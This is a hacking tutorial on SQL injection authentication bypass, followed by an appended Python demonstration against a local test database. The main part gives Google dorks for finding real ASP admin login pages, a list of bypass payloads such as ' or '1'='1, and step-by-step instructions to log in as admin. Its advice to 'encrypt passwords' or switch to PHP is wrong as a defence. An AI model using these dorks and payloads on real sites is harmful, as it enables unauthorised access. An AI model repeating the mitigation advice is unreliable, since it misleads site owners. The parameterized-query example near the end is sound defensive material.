How to hack a website: SQL Injection

Hello friends,
Today I bring to you another hacking trick/method: SQL injection.
What do we understand by SQL injection?
It means injecting SQL queries into another database, or using queries to get an authentication bypass as an admin.
Part 1
Basic SQL injection: gaining an authentication bypass on an admin account. Most sites vulnerable to this are ASP.NET. So first we need to find a site; start by opening Google. Now we type our dork. Definition of "dork": a search entry for a certain type of site/exploit.

There are a large number of Google dorks for basic SQL injection.
Here are the best:
  • inurl:login/admin.asp
  • inurl:admin.asp
  • inurl:admin/login.asp
  • inurl:adminlogin.asp
  • inurl:adminhome.asp
  • inurl:admin_login.asp
  • inurl:administratorlogin.asp
  • inurl:login/administrator.asp
  • inurl:administrator_login.asp
Now, what to do once we get to our site? The site should look something like this:
Welcome to xxxxxxxxxx administrator panel

Username :

Password :
So what we do here is: in the USERNAME field we always type "Admin", and in the PASSWORD field we type our SQL injection.
Here is a list of SQL injections:
  • ' or '1'='1
  • ' or 'x'='x
  • ' or 0=0 --
  • or 0=0 --
  • ' or 0=0 #
  • " or 0=0 #
  • or 0=0 #
  • " or "x"="x
  • ') or ('x'='x
  • ' or 1=1--
  • " or 1=1--
  • or 1=1--
  • ' or a=a--
  • " or "a"="a
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
  • hi" or 1=1 --
  • hi' or 1=1 --
  • 'or'1=1'

TYPE ANY ONE OF THESE IN THE PASSWORD SPACE. There are many more, but these are the best ones that I know.
What this SQL injection is doing:

Confusing the database until it gives you an authentication bypass. So your input should look like this:

username: Admin

password: 'or'1'='1
So click submit and you're in. Wow!
Note: Not all sites are vulnerable

HOW TO SECURE YOUR SITE FROM THIS ATTACK
1- Put encryption on the passwords.
2- Change the platform of your website from asp to php.
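
The bypass described above works because the login page pastes the password text into its SQL statement, so the quote in the input ends the string and the `or` condition becomes part of the query. The following is an added example, not code from the original post: it reproduces this against a throwaway in-memory SQLite database and shows that binding the input as a query parameter stops it. The `users` table, the sample account and the function names are assumptions made for the example.

```python
import sqlite3

def make_db():
    """In-memory database with one constructed admin account (sample data).
    The password is stored in plain text only to keep the sample short."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('Admin', 's3cret-sample')")
    return db

def build_concatenated_sql(username, password):
    """Vulnerable form: user input becomes part of the SQL text itself."""
    return ("SELECT COUNT(*) FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_concatenated(db, username, password):
    """Runs the concatenated query; a quote in the input changes its logic."""
    return db.execute(build_concatenated_sql(username, password)).fetchone()[0] > 0

def login_parameterized(db, username, password):
    """Hardened form: the ? placeholders bind input as data, never as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

if __name__ == "__main__":
    db = make_db()
    tautology = "' or '1'='1"  # first entry in the list on this page
    # The WHERE clause ends in: AND password = '' or '1'='1'
    # AND binds tighter than OR, so the condition is true for every row.
    print(build_concatenated_sql("Admin", tautology))
    print("concatenated, tautology :", login_concatenated(db, "Admin", tautology))
    print("parameterized, tautology:", login_parameterized(db, "Admin", tautology))
    print("parameterized, real pass:", login_parameterized(db, "Admin", "s3cret-sample"))
```

The same placeholder binding is available on every common platform (for example `SqlCommand` parameters in ASP.NET and prepared statements in PHP's PDO), so the fix is in how the query is built.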
